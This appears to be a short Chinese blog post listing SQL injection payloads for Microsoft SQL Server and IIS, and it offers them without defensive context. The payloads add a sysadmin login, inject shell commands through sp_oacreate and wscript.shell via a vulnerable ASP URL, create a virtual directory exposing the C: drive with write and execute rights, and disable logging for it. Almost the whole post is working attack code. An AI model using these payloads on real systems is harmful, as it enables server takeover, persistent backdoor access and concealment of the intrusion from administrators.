关闭

一些SQL注入中的命令

标签: sqlnullc
1084人阅读 评论(0) 收藏 举报
分类:

1、加管理员

exec master..sp_addlogin UserName,Password
exec master..sp_addsrvrolemember UserName,sysadmin

 2、加虚拟目录

http://abc.com/abc.asp?id=1;declare @s varchar(21) set @s='wscript.shell'declare @o int exec sp_oacreate @s,@o out;exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/mkwebdir.vbs -c localhost -w "1" -v "0x07c2","c:/"';exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/chaccess.vbs -a w3svc/1/ROOT/0x07c2 %2Bexecute';exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/chaccess.vbs -a w3svc/1/ROOT/0x07c2 %2Bwrite';exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/chaccess.vbs -a w3svc/1/ROOT/0x07c2 %2Bbrowse';exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/chaccess.vbs -a w3svc/1/ROOT/0x07c2 %2Bwrite';--

http://abc.com/abc.asp?id=1;declare @s varchar(21) set @s='wscript.shell'declare @o int exec sp_oacreate @s,@o out;exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/adsutil.vbs set w3svc/1/root/0x07c2/DontLog 1'

http://abc.com/abc.asp?id=1;declare @s varchar(21) set @s='wscript.shell'declare @o int exec sp_oacreate @s,@o out;exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/adsutil.vbs set w3svc/1/root/0x07c2/EnableDefaultDoc 0'

0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:219039次
    • 积分:3476
    • 等级:
    • 排名:第9526名
    • 原创:123篇
    • 转载:16篇
    • 译文:1篇
    • 评论:21条
    文章分类
    最新评论